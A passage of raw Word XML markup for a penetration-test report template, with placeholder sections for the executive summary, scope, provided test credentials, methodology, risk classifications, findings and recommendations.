                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2960" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F7BA5FA" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52382AC9" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FCE53E2" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE8E3CB" w14:textId="77777777" w:rsidR="00060D9E" w:rsidRPr="00ED747A" w:rsidRDefault="00060D9E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D09658D" w14:textId="6B4E74EF" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc155811471"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>EXECUTIVE SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>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network. The purpose of this assessment was to discover and identify vulnerabilities in &lt;CLIENT NAME&gt;’s infrastructure and suggest methods to remediate the vulnerabilities. &lt;TEAM NAME&gt; identified a total of &lt;VULN TOTAL NUM&gt; vulnerabilities within the scope of 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6E0BE73E" w:rsidR="00475B86" w:rsidRDefault="00475B86">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="58CDBE4D" w14:textId="59B32158" w:rsidR="00475B86" w:rsidRDefault="00475B86">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="680A67DD" w14:textId="4813157E" w:rsidR="00475B86" w:rsidRDefault="00475B86">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="723F6598" w14:textId="1F2C6B87" w:rsidR="00475B86" w:rsidRDefault="00475B86">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pP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 the results of the assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387B52D6" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86"/>
    <w:p w14:paraId="6E25BC66" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc155811472"/>
      <w:r>
        <w:t>&lt;Optional - Big Issue&gt; Recommendation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="38B97B08" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:r>
        <w:t xml:space="preserve">This is an optional paragraph that discusses a very critical series of business failures (e.g. failure to adhere to applicable legal regulations) that isn’t a technical vulnerability but still should be brought to the attention of the executive team. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB1C3FD" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86"/>
    <w:p w14:paraId="44B891D5" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86"/>
    <w:p w14:paraId="77BF78CF" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86"/>
    <w:p w14:paraId="078A94A4" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A74F95E" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc155811473"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>HIGH LEVEL ASSESSMENT OVERVIEW</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="248F8848" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc155811474"/>
      <w:r>
        <w:t>Observed Security Strengths</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="316BF2AC" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:r>
        <w:t>&lt;TEAM NAME&gt; identified the following strengths in &lt;CLIENT NAME&gt;’s network which greatly increases the security of the network. &lt;CLIENT NAME&gt; should continue to monitor these controls to ensure they remain effective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15497306" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_b042z9cl6opw" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r>
        <w:t>&lt;Strength Category&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCE6C0C" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Great thing we saw here that causes us issues (which is a good thing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3313CB0C" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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1961582A" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc155811475"/>
      <w:r>
        <w:t>Areas for Improvement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="467FFDB4" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:r>
        <w:t>&lt;TEAM NAME&gt; recommends &lt;CLIENT NAME&gt; takes the following actions to improve the security of the network. Implementing these recommendations will reduce the likelihood that an attacker will be able to successfully attack &lt;CLIENT NAME&gt;’s information systems and/or reduce the impact of a successful attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3734AFF1" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc155811476"/>
      <w:r>
        <w:t>Short Term Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4E8A50" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:r>
        <w:t xml:space="preserve">&lt;TEAM NAME&gt; recommends &lt;CLIENT NAME&gt; take the following actions as soon as possible to minimize business risk. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D1022" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:widowControl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_dor40lylbmp2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r>
        <w:t>&lt;Recommendation Category&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69009F92" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>&lt;Individual Recommendation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F69F38"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2B4718DD" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="619190E1" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc155811477"/>
      <w:r>
        <w:t>Long Term Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286FE33A" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:widowControl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;TEAM NAME&gt; recommends the following actions be taken over the next &lt;NUM&gt; months to fix hard-to-remediate issues that do not pose an urgent risk to the business.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676CF997" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:widowControl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_rdo1tubjt7va" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;Recommendation Category&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB007AC" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>&lt;Individual Recommendation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2327F4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C086A6" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_n20bhnm5z36" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA3AF7" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc155811478"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SCOPE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="3BB4D319" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">All testing was based on the scope as defined in the Request </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>For</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proposal (RFP) and official written communications. The items in scope are listed below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231336DB" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc155811479"/>
      <w:r>
        <w:t>Networks</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>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Network</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10.0.1.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1F31D2D0" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>Network for Corporate HQ</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rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>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Gotham, NY, branch site</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Heading2"/>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc155811480"/>
      <w:r>
        <w:t>Other</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>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Name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System Type</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IVR System</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Heading2"/>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc155811481"/>
      <w:r>
        <w:t>Provided Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="0C4DE111" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:r>
        <w:t>&lt;CLIENT NAME&gt; provided &lt;TEAM NAME&gt; with the following credentials and access to facilitate the security assessment listed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Item</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Note</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86"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rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>Customer Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7155" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1142C489" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t xml:space="preserve">(testuser@example.com) A fake customer account in the XXXX application for testing functionality that requires authentication.  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86"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rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>IVR Testing Phone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7155" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="76DE8C6A" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>(555-555-5678) Specific phone to use for IVR system testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51813DF0" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6631F2C2" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_kfuezk755tht" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="253ADCC3" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc155811482"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>TESTING METHODOLOGY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="5E33E7F9" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:r>
        <w:t xml:space="preserve">&lt;TEAM NAME GOES HERE&gt;’s testing methodology was split into three phases: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Target Assessment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Execution of Vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t>. During reconnaissance, we gathered information about &lt;CLIENT NAME&gt;’s network systems. &lt;TEAM NAME GOES HERE&gt; used port scanning and other enumeration methods to refine target information and assess target values. Next, we conducted our targeted assessment. &lt;TEAM NAME GOES HERE&gt; simulated an attacker exploiting vulnerabilities in the &lt;CLIENT NAME&gt; network. &lt;TEAM NAME GOES HERE&gt; gathered evidence of vulnerabilities during this phase of the engagement while conducting the simulation in a manner that would not disrupt normal business operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0264B74E" w14:textId="77777777" w:rsidR="001D7723" w:rsidRDefault="001D7723" w:rsidP="001D7723"/>
    <w:p w14:paraId="7640378F" w14:textId="0B98DD0B" w:rsidR="00475B86" w:rsidRDefault="00922DBC" w:rsidP="001D7723">
      <w:r>
        <w:t>The following image is a graphical representation of this methodology.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A053F3" w14:textId="2037E124" w:rsidR="00475B86" w:rsidRDefault="001D7723" w:rsidP="00ED747A">
      <w:bookmarkStart w:id="43" w:name="_tt2dclm9r0d3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>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Default="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc155811483"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CLASSIFICATION DEFINITIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="68AAD86F" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc155811484"/>
      <w:r>
        <w:t>Risk Classifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>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46" w:name="_n2vg1pp2wwur" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="47" w:name="_Toc155811485"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r>
        <w:t>Exploitation Likelihood Classifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>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 xml:space="preserve">Exploitation requires </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>deep</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">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48" w:name="_Toc155811486"/>
      <w:r>
        <w:t>Business Impact Classifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>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49" w:name="_Toc155811487"/>
      <w:r>
        <w:t>Remediation Difficulty Classifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>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50" w:name="_r2tozm8dlceh" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC05A4E" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc155811488"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ASSESSMENT FINDINGS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>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rPr>
              <w:t>HIGH RISK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rPr>
              <w:t>Exploitation Likelihood</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rPr>
              <w:t>Possible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rPr>
              <w:t>Severe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rPr>
              <w:t>Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F9013F5" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86"/>
    <w:p w14:paraId="055A9658" w14:textId="77777777"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very important because it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>can</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">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Appendix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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">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lastRenderedPageBreak/>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F39EEBA" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove XYZ to make things more </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>secure</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidR="00922DBC">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/Sevaarcen/RADAR/tree/master/radar/playbooks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48E4E17B" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidR="00922DBC">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
